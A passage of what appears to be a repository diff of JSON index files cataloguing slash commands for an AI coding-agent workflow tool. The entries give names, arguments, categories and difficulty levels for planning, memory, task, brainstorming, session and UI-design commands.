},
{
"name": "design-sync",
"command": "/workflow:ui-design:design-sync",
"description": "Synchronize finalized design system references to brainstorming artifacts, preparing them for /workflow:plan consumption",
"arguments": "--session <session_id> [--selected-prototypes \"<list>\"]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/design-sync.md"
},
{
"name": "explore-auto",
"command": "/workflow:ui-design:explore-auto",
"description": "Interactive exploratory UI design workflow with style-centric batch generation, creates design variants from prompts/images with parallel execution and user selection",
"arguments": "[--input \"<value>\"] [--targets \"<list>\"] [--target-type \"page|component\"] [--session <id>] [--style-variants <count>] [--layout-variants <count>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/explore-auto.md"
},
{
"name": "generate",
"command": "/workflow:ui-design:generate",
"description": "Assemble UI prototypes by combining layout templates with design tokens (default animation support), pure assembler without new content generation",
"arguments": "[--design-id <id>] [--session <id>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/generate.md"
},
{
"name": "imitate-auto",
"command": "/workflow:ui-design:imitate-auto",
"description": "UI design workflow with direct code/image input for design token extraction and prototype generation",
"arguments": "[--input \"<value>\"] [--session <id>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/imitate-auto.md"
},
{
"name": "workflow:ui-design:import-from-code",
"command": "/workflow:ui-design:import-from-code",
"description": "Import design system from code files (CSS/JS/HTML/SCSS) with automatic file discovery and parallel agent analysis",
"arguments": "[--design-id <id>] [--session <id>] [--source <path>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/import-from-code.md"
},
{
"name": "layout-extract",
"command": "/workflow:ui-design:layout-extract",
"description": "Extract structural layout information from reference images or text prompts using Claude analysis with variant generation or refinement mode",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--targets \"<list>\"] [--variants <count>] [--device-type <desktop|mobile|tablet|responsive>] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/layout-extract.md"
},
{
"name": "workflow:ui-design:reference-page-generator",
"command": "/workflow:ui-design:reference-page-generator",
"description": "Generate multi-component reference pages and documentation from design run extraction",
"arguments": "[--design-run <path>] [--package-name <name>] [--output-dir <path>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/reference-page-generator.md"
},
{
"name": "style-extract",
"command": "/workflow:ui-design:style-extract",
"description": "Extract design style from reference images or text prompts using Claude analysis with variant generation or refinement mode",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--variants <count>] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/style-extract.md"
}
]

View File

@@ -1,914 +0,0 @@
{
"cli": {
"_root": [
{
"name": "cli-init",
"command": "/cli:cli-init",
"description": "Generate .gemini/ and .qwen/ config directories with settings.json and ignore files based on workspace technology detection",
"arguments": "[--tool gemini|qwen|all] [--output path] [--preview]",
"category": "cli",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/cli/cli-init.md"
}
]
},
"general": {
"_root": [
{
"name": "enhance-prompt",
"command": "/enhance-prompt",
"description": "Enhanced prompt transformation using session memory and intent analysis with --enhance flag detection",
"arguments": "user input to enhance",
"category": "general",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/enhance-prompt.md"
},
{
"name": "version",
"command": "/version",
"description": "Display Claude Code version information and check for updates",
"arguments": "",
"category": "general",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Beginner",
"source": "../../../commands/version.md"
}
]
},
"issue": {
"_root": [
{
"name": "issue:discover",
"command": "/issue:discover",
"description": "Discover potential issues from multiple perspectives (bug, UX, test, quality, security, performance, maintainability, best-practices) using CLI explore. Supports Exa external research for security and best-practices perspectives.",
"arguments": "<path-pattern> [--perspectives=bug,ux,...] [--external]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/discover.md"
},
{
"name": "execute",
"command": "/issue:execute",
"description": "Execute queue with codex using DAG-based parallel orchestration (solution-level)",
"arguments": "[--worktree] [--queue <queue-id>]",
"category": "issue",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/issue/execute.md"
},
{
"name": "new",
"command": "/issue:new",
"description": "Create structured issue from GitHub URL or text description",
"arguments": "<github-url | text-description> [--priority 1-5]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/new.md"
},
{
"name": "plan",
"command": "/issue:plan",
"description": "Batch plan issue resolution using issue-plan-agent (explore + plan closed-loop)",
"arguments": "--all-pending <issue-id>[,<issue-id>,...] [--batch-size 3] ",
"category": "issue",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/issue/plan.md"
},
{
"name": "queue",
"command": "/issue:queue",
"description": "Form execution queue from bound solutions using issue-queue-agent (solution-level)",
"arguments": "[--rebuild] [--issue <id>]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/queue.md"
}
]
},
"memory": {
"_root": [
{
"name": "code-map-memory",
"command": "/memory:code-map-memory",
"description": "3-phase orchestrator: parse feature keyword → cli-explore-agent analyzes (Deep Scan dual-source) → orchestrator generates Mermaid docs + SKILL package (skips phase 2 if exists)",
"arguments": "\\\"feature-keyword\\\" [--regenerate] [--tool <gemini|qwen>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/code-map-memory.md"
},
{
"name": "compact",
"command": "/memory:compact",
"description": "Compact current session memory into structured text for session recovery, extracting objective/plan/files/decisions/constraints/state, and save via MCP core_memory tool",
"arguments": "[optional: session description]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/compact.md"
},
{
"name": "docs-full-cli",
"command": "/memory:docs-full-cli",
"description": "Generate full project documentation using CLI execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
"arguments": "[path] [--tool <gemini|qwen|codex>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs-full-cli.md"
},
{
"name": "docs-related-cli",
"command": "/memory:docs-related-cli",
"description": "Generate/update documentation for git-changed modules using CLI execution with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <15 modules uses direct parallel",
"arguments": "[--tool <gemini|qwen|codex>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs-related-cli.md"
},
{
"name": "docs",
"command": "/memory:docs",
"description": "Plan documentation workflow with dynamic grouping (≤10 docs/task), generates IMPL tasks for parallel module trees, README, ARCHITECTURE, and HTTP API docs",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--mode <full|partial>] [--cli-execute]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs.md"
},
{
"name": "load-skill-memory",
"command": "/memory:load-skill-memory",
"description": "Activate SKILL package (auto-detect from paths/keywords or manual) and intelligently load documentation based on task intent keywords",
"arguments": "[skill_name] \\\"task intent description\\",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/load-skill-memory.md"
},
{
"name": "load",
"command": "/memory:load",
"description": "Delegate to universal-executor agent to analyze project via Gemini/Qwen CLI and return JSON core content package for task context",
"arguments": "[--tool gemini|qwen] \\\"task context description\\",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/load.md"
},
{
"name": "skill-memory",
"command": "/memory:skill-memory",
"description": "4-phase autonomous orchestrator: check docs → /memory:docs planning → /workflow:execute → generate SKILL.md with progressive loading index (skips phases 2-3 if docs exist)",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--regenerate] [--mode <full|partial>] [--cli-execute]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/skill-memory.md"
},
{
"name": "style-skill-memory",
"command": "/memory:style-skill-memory",
"description": "Generate SKILL memory package from style reference for easy loading and consistent design system usage",
"arguments": "[package-name] [--regenerate]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/style-skill-memory.md"
},
{
"name": "swagger-docs",
"command": "/memory:swagger-docs",
"description": "Generate complete Swagger/OpenAPI documentation following RESTful standards with global security, API details, error codes, and validation tests",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--format <yaml|json>] [--version <v3.0|v3.1>] [--lang <zh|en>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/swagger-docs.md"
},
{
"name": "tech-research-rules",
"command": "/memory:tech-research-rules",
"description": "3-phase orchestrator: extract tech stack → Exa research → generate path-conditional rules (auto-loaded by Claude Code)",
"arguments": "[session-id | tech-stack-name] [--regenerate] [--tool <gemini|qwen>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/tech-research-rules.md"
},
{
"name": "update-full",
"command": "/memory:update-full",
"description": "Update all CLAUDE.md files using layer-based execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
"arguments": "[--tool gemini|qwen|codex] [--path <directory>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/update-full.md"
},
{
"name": "update-related",
"command": "/memory:update-related",
"description": "Update CLAUDE.md for git-changed modules using batched agent execution (4 modules/agent) with gemini→qwen→codex fallback, <15 modules uses direct execution",
"arguments": "[--tool gemini|qwen|codex]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/update-related.md"
},
{
"name": "workflow-skill-memory",
"command": "/memory:workflow-skill-memory",
"description": "Process WFS-* archived sessions using universal-executor agents with Gemini analysis to generate workflow-progress SKILL package (sessions-timeline, lessons, conflicts)",
"arguments": "session <session-id> | all",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/workflow-skill-memory.md"
}
]
},
"task": {
"_root": [
{
"name": "breakdown",
"command": "/task:breakdown",
"description": "Decompose complex task into subtasks with dependency mapping, creates child task JSONs with parent references and execution order",
"arguments": "task-id",
"category": "task",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/task/breakdown.md"
},
{
"name": "create",
"command": "/task:create",
"description": "Generate task JSON from natural language description with automatic file pattern detection, scope inference, and dependency analysis",
"arguments": "\\\"task title\\",
"category": "task",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/task/create.md"
},
{
"name": "execute",
"command": "/task:execute",
"description": "Execute task JSON using appropriate agent (@doc-generator/@implementation-agent/@test-agent) with pre-analysis context loading and status tracking",
"arguments": "task-id",
"category": "task",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/task/execute.md"
},
{
"name": "replan",
"command": "/task:replan",
"description": "Update task JSON with new requirements or batch-update multiple tasks from verification report, tracks changes in task-changes.json",
"arguments": "task-id [\\\"text\\\"|file.md] | --batch [verification-report.md]",
"category": "task",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/task/replan.md"
}
]
},
"workflow": {
"_root": [
{
"name": "action-plan-verify",
"command": "/workflow:action-plan-verify",
"description": "Perform non-destructive cross-artifact consistency analysis between IMPL_PLAN.md and task JSONs with quality gate validation",
"arguments": "[optional: --session session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/action-plan-verify.md"
},
{
"name": "clean",
"command": "/workflow:clean",
"description": "Intelligent code cleanup with mainline detection, stale artifact discovery, and safe execution",
"arguments": "[--dry-run] [\\\"focus area\\\"]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/clean.md"
},
{
"name": "debug",
"command": "/workflow:debug",
"description": "Interactive hypothesis-driven debugging with NDJSON logging, iterative until resolved",
"arguments": "\\\"bug description or error message\\",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/debug.md"
},
{
"name": "execute",
"command": "/workflow:execute",
"description": "Coordinate agent execution for workflow tasks with automatic session discovery, parallel task processing, and status tracking",
"arguments": "[--resume-session=\\\"session-id\\\"]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/execute.md"
},
{
"name": "init",
"command": "/workflow:init",
"description": "Initialize project-level state with intelligent project analysis using cli-explore-agent",
"arguments": "[--regenerate]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/init.md"
},
{
"name": "lite-execute",
"command": "/workflow:lite-execute",
"description": "Execute tasks based on in-memory plan, prompt description, or file content",
"arguments": "[--in-memory] [\\\"task description\\\"|file-path]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-execute.md"
},
{
"name": "lite-fix",
"command": "/workflow:lite-fix",
"description": "Lightweight bug diagnosis and fix workflow with intelligent severity assessment and optional hotfix mode for production incidents",
"arguments": "[--hotfix] \\\"bug description or issue reference\\",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-fix.md"
},
{
"name": "lite-plan",
"command": "/workflow:lite-plan",
"description": "Lightweight interactive planning workflow with in-memory planning, code exploration, and execution dispatch to lite-execute after user confirmation",
"arguments": "[-e|--explore] \\\"task description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-plan.md"
},
{
"name": "plan",
"command": "/workflow:plan",
"description": "5-phase planning workflow with action-planning-agent task generation, outputs IMPL_PLAN.md and task JSONs",
"arguments": "\\\"text description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/plan.md"
},
{
"name": "replan",
"command": "/workflow:replan",
"description": "Interactive workflow replanning with session-level artifact updates and boundary clarification through guided questioning",
"arguments": "[--session session-id] [task-id] \\\"requirements\\\"|file.md [--interactive]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/replan.md"
},
{
"name": "review-fix",
"command": "/workflow:review-fix",
"description": "Automated fixing of code review findings with AI-powered planning and coordinated execution. Uses intelligent grouping, multi-stage timeline coordination, and test-driven verification.",
"arguments": "<export-file|review-dir> [--resume] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-fix.md"
},
{
"name": "review-module-cycle",
"command": "/workflow:review-module-cycle",
"description": "Independent multi-dimensional code review for specified modules/files. Analyzes specific code paths across 7 dimensions with hybrid parallel-iterative execution, independent of workflow sessions.",
"arguments": "<path-pattern> [--dimensions=security,architecture,...] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-module-cycle.md"
},
{
"name": "review-session-cycle",
"command": "/workflow:review-session-cycle",
"description": "Session-based comprehensive multi-dimensional code review. Analyzes git changes from workflow session across 7 dimensions with hybrid parallel-iterative execution, aggregates findings, and performs focused deep-dives on critical issues until quality gates met.",
"arguments": "[session-id] [--dimensions=security,architecture,...] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-session-cycle.md"
},
{
"name": "review",
"command": "/workflow:review",
"description": "Post-implementation review with specialized types (security/architecture/action-items/quality) using analysis agents and Gemini",
"arguments": "[--type=security|architecture|action-items|quality] [--archived] [optional: session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review.md"
},
{
"name": "tdd-plan",
"command": "/workflow:tdd-plan",
"description": "TDD workflow planning with Red-Green-Refactor task chain generation, test-first development structure, and cycle tracking",
"arguments": "\\\"feature description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tdd-plan.md"
},
{
"name": "tdd-verify",
"command": "/workflow:tdd-verify",
"description": "Verify TDD workflow compliance against Red-Green-Refactor cycles, generate quality report with coverage analysis",
"arguments": "[optional: WFS-session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tdd-verify.md"
},
{
"name": "test-cycle-execute",
"command": "/workflow:test-cycle-execute",
"description": "Execute test-fix workflow with dynamic task generation and iterative fix cycles until test pass rate >= 95% or max iterations reached. Uses @cli-planning-agent for failure analysis and task generation.",
"arguments": "[--resume-session=\\\"session-id\\\"] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-cycle-execute.md"
},
{
"name": "test-fix-gen",
"command": "/workflow:test-fix-gen",
"description": "Create test-fix workflow session from session ID, description, or file path with test strategy generation and task planning",
"arguments": "(source-session-id | \\\"feature description\\\" | /path/to/file.md)",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-fix-gen.md"
},
{
"name": "test-gen",
"command": "/workflow:test-gen",
"description": "Create independent test-fix workflow session from completed implementation session, analyzes code to generate test tasks",
"arguments": "source-session-id",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-gen.md"
}
],
"brainstorm": [
{
"name": "api-designer",
"command": "/workflow:brainstorm:api-designer",
"description": "Generate or update api-designer/analysis.md addressing guidance-specification discussion points for API design perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/api-designer.md"
},
{
"name": "artifacts",
"command": "/workflow:brainstorm:artifacts",
"description": "Interactive clarification generating confirmed guidance specification through role-based analysis and synthesis",
"arguments": "topic or challenge description [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/artifacts.md"
},
{
"name": "auto-parallel",
"command": "/workflow:brainstorm:auto-parallel",
"description": "Parallel brainstorming automation with dynamic role selection and concurrent execution across multiple perspectives",
"arguments": "topic or challenge description\" [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/brainstorm/auto-parallel.md"
},
{
"name": "data-architect",
"command": "/workflow:brainstorm:data-architect",
"description": "Generate or update data-architect/analysis.md addressing guidance-specification discussion points for data architecture perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/data-architect.md"
},
{
"name": "product-manager",
"command": "/workflow:brainstorm:product-manager",
"description": "Generate or update product-manager/analysis.md addressing guidance-specification discussion points for product management perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/product-manager.md"
},
{
"name": "product-owner",
"command": "/workflow:brainstorm:product-owner",
"description": "Generate or update product-owner/analysis.md addressing guidance-specification discussion points for product ownership perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/product-owner.md"
},
{
"name": "scrum-master",
"command": "/workflow:brainstorm:scrum-master",
"description": "Generate or update scrum-master/analysis.md addressing guidance-specification discussion points for Agile process perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/scrum-master.md"
},
{
"name": "subject-matter-expert",
"command": "/workflow:brainstorm:subject-matter-expert",
"description": "Generate or update subject-matter-expert/analysis.md addressing guidance-specification discussion points for domain expertise perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/subject-matter-expert.md"
},
{
"name": "synthesis",
"command": "/workflow:brainstorm:synthesis",
"description": "Clarify and refine role analyses through intelligent Q&A and targeted updates with synthesis agent",
"arguments": "[optional: --session session-id]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/brainstorm/synthesis.md"
},
{
"name": "system-architect",
"command": "/workflow:brainstorm:system-architect",
"description": "Generate or update system-architect/analysis.md addressing guidance-specification discussion points for system architecture perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/system-architect.md"
},
{
"name": "ui-designer",
"command": "/workflow:brainstorm:ui-designer",
"description": "Generate or update ui-designer/analysis.md addressing guidance-specification discussion points for UI design perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/ui-designer.md"
},
{
"name": "ux-expert",
"command": "/workflow:brainstorm:ux-expert",
"description": "Generate or update ux-expert/analysis.md addressing guidance-specification discussion points for UX perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/ux-expert.md"
}
],
"session": [
{
"name": "complete",
"command": "/workflow:session:complete",
"description": "Mark active workflow session as complete, archive with lessons learned, update manifest, remove active flag",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/complete.md"
},
{
"name": "list",
"command": "/workflow:session:list",
"description": "List all workflow sessions with status filtering, shows session metadata and progress information",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Beginner",
"source": "../../../commands/workflow/session/list.md"
},
{
"name": "resume",
"command": "/workflow:session:resume",
"description": "Resume the most recently paused workflow session with automatic session discovery and status update",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/resume.md"
},
{
"name": "solidify",
"command": "/workflow:session:solidify",
"description": "Crystallize session learnings and user-defined constraints into permanent project guidelines",
"arguments": "[--type <convention|constraint|learning>] [--category <category>] \\\"rule or insight\\",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/solidify.md"
},
{
"name": "start",
"command": "/workflow:session:start",
"description": "Discover existing sessions or start new workflow session with intelligent session management and conflict detection",
"arguments": "[--type <workflow|review|tdd|test|docs>] [--auto|--new] [optional: task description for new session]",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/start.md"
}
],
"tools": [
{
"name": "conflict-resolution",
"command": "/workflow:tools:conflict-resolution",
"description": "Detect and resolve conflicts between plan and existing codebase using CLI-powered analysis with Gemini/Qwen",
"arguments": "--session WFS-session-id --context path/to/context-package.json",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/conflict-resolution.md"
},
{
"name": "gather",
"command": "/workflow:tools:gather",
"description": "Intelligently collect project context using context-search-agent based on task description, packages into standardized JSON",
"arguments": "--session WFS-session-id \\\"task description\\",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/context-gather.md"
},
{
"name": "task-generate-agent",
"command": "/workflow:tools:task-generate-agent",
"description": "Generate implementation plan documents (IMPL_PLAN.md, task JSONs, TODO_LIST.md) using action-planning-agent - produces planning artifacts, does NOT execute code implementation",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/task-generate-agent.md"
},
{
"name": "task-generate-tdd",
"command": "/workflow:tools:task-generate-tdd",
"description": "Autonomous TDD task generation using action-planning-agent with Red-Green-Refactor cycles, test-first structure, and cycle validation",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/task-generate-tdd.md"
},
{
"name": "tdd-coverage-analysis",
"command": "/workflow:tools:tdd-coverage-analysis",
"description": "Analyze test coverage and TDD cycle execution with Red-Green-Refactor compliance verification",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/tdd-coverage-analysis.md"
},
{
"name": "test-concept-enhanced",
"command": "/workflow:tools:test-concept-enhanced",
"description": "Coordinate test analysis workflow using cli-execution-agent to generate test strategy via Gemini",
"arguments": "--session WFS-test-session-id --context path/to/test-context-package.json",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-concept-enhanced.md"
},
{
"name": "test-context-gather",
"command": "/workflow:tools:test-context-gather",
"description": "Collect test coverage context using test-context-search-agent and package into standardized test-context JSON",
"arguments": "--session WFS-test-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-context-gather.md"
},
{
"name": "test-task-generate",
"command": "/workflow:tools:test-task-generate",
"description": "Generate test planning documents (IMPL_PLAN.md, test task JSONs, TODO_LIST.md) using action-planning-agent - produces test planning artifacts, does NOT execute tests",
"arguments": "--session WFS-test-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-task-generate.md"
}
],
"ui-design": [
{
"name": "animation-extract",
"command": "/workflow:ui-design:animation-extract",
"description": "Extract animation and transition patterns from prompt inference and image references for design system documentation",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--focus \"<types>\"] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/animation-extract.md"
},
{
"name": "workflow:ui-design:codify-style",
"command": "/workflow:ui-design:codify-style",
"description": "Orchestrator to extract styles from code and generate shareable reference package with preview (automatic file discovery)",
"arguments": "<path> [--package-name <name>] [--output-dir <path>] [--overwrite]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/codify-style.md"
},
{
"name": "design-sync",
"command": "/workflow:ui-design:design-sync",
"description": "Synchronize finalized design system references to brainstorming artifacts, preparing them for /workflow:plan consumption",
"arguments": "--session <session_id> [--selected-prototypes \"<list>\"]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/design-sync.md"
},
{
"name": "explore-auto",
"command": "/workflow:ui-design:explore-auto",
"description": "Interactive exploratory UI design workflow with style-centric batch generation, creates design variants from prompts/images with parallel execution and user selection",
"arguments": "[--input \"<value>\"] [--targets \"<list>\"] [--target-type \"page|component\"] [--session <id>] [--style-variants <count>] [--layout-variants <count>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/explore-auto.md"
},
{
"name": "generate",
"command": "/workflow:ui-design:generate",
"description": "Assemble UI prototypes by combining layout templates with design tokens (default animation support), pure assembler without new content generation",
"arguments": "[--design-id <id>] [--session <id>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/generate.md"
},
{
"name": "imitate-auto",
"command": "/workflow:ui-design:imitate-auto",
"description": "UI design workflow with direct code/image input for design token extraction and prototype generation",
"arguments": "[--input \"<value>\"] [--session <id>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
